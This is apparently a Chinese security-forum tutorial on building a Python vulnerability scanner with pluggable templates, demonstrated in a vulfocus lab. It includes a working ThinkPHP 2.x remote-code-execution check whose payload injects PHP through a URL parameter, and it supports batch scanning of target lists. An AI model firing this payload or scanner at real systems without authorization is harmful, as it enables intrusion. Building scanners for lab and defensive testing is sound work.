从零构建:我的漏洞扫描器之旅
次于完美 发表于 广东 安全工具 429浏览 · 2024-12-04 02:38

从零构建自己的漏洞扫描器。为满足大家的期待,先给大家看一下最后的效果。

接下来构建属于自己的漏洞扫描器,首先漏洞扫描器要有几个硬性需求。

  1. 可以批量扫描
  2. 模板文件具有通用性
  3. 结果直观

设计研究

先设计扫描器的大体框架,扫描的入口,主要从来命令行中接受用户输入的参数
这里设计三个点
1、-u单个url扫描
2、-f指定文件批量扫描
3、-t指定扫描模板文件

下面是实现代码

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="漏洞扫描工具。")
    parser.add_argument('-u','--url',type=str,help='单个目标扫描。')
    parser.add_argument('-f', '--file', type=str, help='多目标批量扫描。')
    parser.add_argument('-t', '--template', type=str, help='指定扫描模板文件。')
    args = parser.parse_args()

    if '-u' in sys.argv and '-t' in sys.argv:
       pass
    elif '-f' in sys.argv and '-t' in sys.argv:
       pass
    else:
       pass

接下来就是最重要的一点,扫描的模板文件,这里我们参考pocsuite来设计

import datetime
from urllib.parse import urljoin
import requests
from PublicMethod import host_to_ip
from PublicMethod import success


#漏洞扫描模板文件
class vul_scan:
    def __init__(self):
        pass

    def vul_name(url):
        protocol, ip_address, port = host_to_ip.normalize_and_parse_url(url,host_to_ip=False)
        target = f'{protocol}://{ip_address}:{port}'

        #定义漏洞信息,初始漏洞结果False,这里只需要更改name
        result = {
            'name': '漏洞名称',
            'vulnerable' :False,
            'method': 'None',
            'url': url,
            'payload': 'None'
        }

        try:
            #向目标发起检测请求,这里需要自定义修改
            headers = {
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
            }
            uri = ''
            target = urljoin(target, uri)
            response = requests.get(url=target, headers=headers, timeout=5, verify=False)

            #漏洞触发条件
            if True:
                result['vulnerable'] = True
                result['method'] = 'POST'
                result['url'] = url
                result['payload'] = uri
                success.VulExist(result)
                return result
            else:
                return result
        except Exception as e:
            return result

#调用的主入口
def start_scan(self):
    return vul_scan.vul_name(self)   #thinkphp_2x_rce名称后面可以自己自定义,但vul_scan是不变的

看到这里导入了两个文件host_to_ip, successhost_to_ip是对用户传入的url进行处理,success是在成功触发漏洞后将漏洞详情进行base64编码再输出。
success

import base64
from colorama import init, Fore, Style

def VulExist(data):
    data = str(data)
    # 初始化colorama
    init(autoreset=True)
    # 将数据编码为字节(如果它还不是字节)
    if isinstance(data, str):
        data_bytes = data.encode('utf-8')
    else:
        data_bytes = data

    # 对数据进行Base64编码
    encoded_bytes = base64.b64encode(data_bytes)

    # 将编码后的字节转换为字符串(为了输出)
    encoded_str = encoded_bytes.decode('utf-8')

    # 输出编码后的字符串
    print(Fore.CYAN + encoded_str)

    # 如果你想要在输出后重置颜色,确保init(autoreset=True)已经被调用,
    # 或者在打印后手动添加Style.RESET_ALL
    # print(Style.RESET_ALL)  # 这行通常不需要,因为我们已经设置了autoreset=True

host_to_ip

from urllib.parse import urlparse, urlunparse
import socket


def normalize_and_parse_url(url, host_to_ip=False):
    # 如果URL没有协议,则默认添加http://
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url if '://' not in url else url  # 简单处理,假设没有://则一定是http
        # 注意:这里做了一个简化的假设,即如果没有://则一定是http,这在实际中可能不准确。
        # 更健壮的做法是检查url是否以www.开头,但这样也可能有误判。
        # 更好的做法可能是要求用户输入完整的URL或提供额外的参数来指定协议。
        # 这里为了示例简单起见,我们采用这个简化的方法。

        # 但是,上面的逻辑有一个问题:如果url已经是完整的比如http://www.example.com,它会被错误地改为http://http://www.example.com。
        # 因此,我们需要更精确地检查并只添加当缺少协议时。
        if '://' not in url:
            url = 'http://' + url

    # 使用 urlparse 解析 URL
    parsed_url = urlparse(url)

    # 提取协议(此时应该已经有了)
    protocol = parsed_url.scheme

    # 提取主机名(可能是 IP 地址或域名)
    host = parsed_url.hostname

    # 提取端口号,如果没有指定端口,则使用默认值
    port = parsed_url.port or 80  # 默认HTTP端口是80

    # 如果协议是https但端口是80(由于默认添加http://可能导致的问题),则更正端口为443(但这通常不会发生,因为我们已经添加了协议)
    # 注意:这里的逻辑其实是不必要的,因为我们已经在上面确保了URL有协议。但为了完整性,我还是保留了注释。
    # if protocol == 'https' and port == 80:
    #     port = 443  # 但这通常不会发生在我们当前的逻辑下,因为我们已经通过添加协议确保了正确的端口(如果有的话)

    # 如果 host_to_ip 为 True,则尝试将主机名解析为 IP 地址
    if host_to_ip:
        try:
            ip_address = socket.gethostbyname(host)
        except socket.gaierror:
            # 如果主机名无法解析为 IP 地址,则抛出异常
            raise ValueError(f"Cannot resolve hostname {host} to an IP address")
    else:
        # 否则,直接使用主机名
        ip_address = host

    # 注意:这里没有重新构造完整的URL,因为我们的目的是提取信息,而不是修改URL。
    # 如果需要构造一个新的URL,可以使用urlunparse()函数与修改后的组件。

    return protocol, ip_address, port


if __name__ == '__main__':
    # 示例使用
    urls = [
        "192.168.159.129:46676",
        "http://example.com:8080",
        "https://192.168.1.1",
        "ftp://should_fail.com"  # 这个将不会被正确处理,因为我们只处理http和https
    ]

    for url in urls:
        try:
            protocol, ip, port = normalize_and_parse_url(url)
            print(f"URL: {url}")
            print(f"Protocol: {protocol}")
            print(f"IP Address/Hostname: {ip}")
            print(f"Port: {port}")
            print('-' * 40)
        except ValueError as e:
            print(e)
            print('-' * 40)

接下来就是要在主入口中调用模板文件,现在有个问题,批量扫描的时候是不是要多次加载模板文件,这样虽然也可以执行,但效率不高。我们可以定义一个全局变量缓存模块,再来调用避免重复加载损失性能。

def load_module(module_path):
    global cached_module
    if cached_module is None:
        # 加载指定的Python模块
        module_name = module_path.replace('.py', '').split('/')[-1]  # 获取模块名,不包含路径和扩展名
        spec = importlib.util.spec_from_file_location(module_name, module_path)
        cached_module = importlib.util.module_from_spec(spec)
        sys.modules[module_name] = cached_module  # 注册模块
        spec.loader.exec_module(cached_module)  # 执行模块
    return cached_module

def call_start_scan(module, url):
    if hasattr(module, 'start_scan'):
        return module.start_scan(url)  # 调用 start_scan 函数并传入 URL 参数
    else:
        print(f"Function 'start_scan' not found in the module.")

最后还有一个漂亮的表格输出

这里大家开头也看到了,上面我们把漏洞详情return了,只要把结果传入就行。

from prettytable import PrettyTable
from termcolor import colored

def FormatOutput(data_list):
    # 多个数据字典(以用户提供的顺序)
    # data_list = [
    #     {'name': 'thinkphp_2x_rce', 'vulnerable': True, 'method': 'POST', 'url': '192.168.159.129:16963',
    #      'payload': '?s=/sec/test/00/${var_dump(md5(9527))}'}
    # ]

    # 创建表格对象
    table = PrettyTable()

    # 获取字段名,确保vulnerable在最后
    table.field_names = ['name', 'method', 'url', 'payload', 'vulnerable']

    # 使用termcolor的colored方法为列名加粗
    table.field_names = [colored(field, attrs=['bold']) for field in table.field_names]

    # 添加每一行数据
    for index, data in enumerate(data_list):
        row_values = [data['name'], data['method'], data['url'], data['payload'], data['vulnerable']]

        # 根据vulnerable的值给出不同的颜色
        vulnerable_value = data['vulnerable']
        if vulnerable_value:
            row_values[4] = colored('True', 'green')
        else:
            row_values[4] = colored('False', 'red')

        # 添加数据行
        table.add_row(row_values)

        # 如果不是最后一行,添加虚线分隔符
        if index < len(data_list) - 1:
            table.add_row(['-' * len(field) for field in table.field_names])

    # 打印表格
    print(table)

现在功能都完成了,最后就是组装,再从入口优化一下

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="漏洞扫描工具。")
    parser.add_argument('-u','--url',type=str,help='单个目标扫描。')
    parser.add_argument('-f', '--file', type=str, help='多目标批量扫描。')
    parser.add_argument('-t', '--template', type=str, help='指定扫描模板文件。')
    args = parser.parse_args()

    if '-u' in sys.argv and '-t' in sys.argv:
        data_list = []
        # 加载模块并缓存
        module = load_module(args.template)
        data = call_start_scan(module, args.url)
        data_list.append(data)
        FormatOutput.FormatOutput(data_list)

    elif '-f' in sys.argv and '-t' in sys.argv:
        try:
            data_list = []# 加载模块并缓存
            module = load_module(args.template)
            with open(args.file, 'r') as files:
                file = [line.strip() for line in files if line.strip()]
            for url in file:
                data = call_start_scan(module, url)
                data_list.append(data)
            FormatOutput.FormatOutput(data_list)
        except Exception as e:
            pass
    else:
        pass

效果验证

现在来验证一下,这里我们用thinkphp_2x_rce漏洞来演示,靶场就使用vulfocus

这里漏洞模板编写直接通过上面的模板修改就行。直接来看修改后的结果。

import datetime
from urllib.parse import urljoin
import requests
from PublicMethod import host_to_ip
from PublicMethod import success


#漏洞扫描模板文件
class vul_scan:
    def __init__(self):
        pass

    def thinkphp_2x_rce(url):
        protocol, ip_address, port = host_to_ip.normalize_and_parse_url(url,host_to_ip=False)
        target = f'{protocol}://{ip_address}:{port}'

        #定义漏洞信息,初始漏洞结果False,这里只需要更改name
        result = {
            'name': 'thinkphp_2x_rce',
            'vulnerable' :False,
            'method': 'None',
            'url': url,
            'payload': 'None'
        }

        try:
            #向目标发起检测请求,这里需要自定义修改
            headers = {
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
            }
            uri = '?s=/sec/test/00/${var_dump(md5(9527))}'
            target = urljoin(target, uri)
            response = requests.get(url=target, headers=headers, timeout=5, verify=False)

            #漏洞结果匹配,符合将漏洞结果设置为True,并添加漏洞详情返回
            if '52569c045dc348f12dfc4c85000ad832' in response.text:
                result['vulnerable'] = True
                result['method'] = 'POST'
                result['url'] = url
                result['payload'] = uri
                success.VulExist(result)
                return result
            else:
                return result
        except Exception as e:
            return result

#调用的主入口
def start_scan(self):
    return vul_scan.thinkphp_2x_rce(self)   #thinkphp_2x_rce名称后面可以自己自定义,但vul_scan是不变的

下面来看看效果
单url测试

多目标批量扫描

优化

有几个优化的点大家可以自己去修改:

  1. 使用多线程提高效率
  2. 不指定模板时设置默认扫描的模板
  3. 一次指定多个模板文件
  4. 添加-p参数设置代理便于分析
1 条评论
某人
表情
可输入 255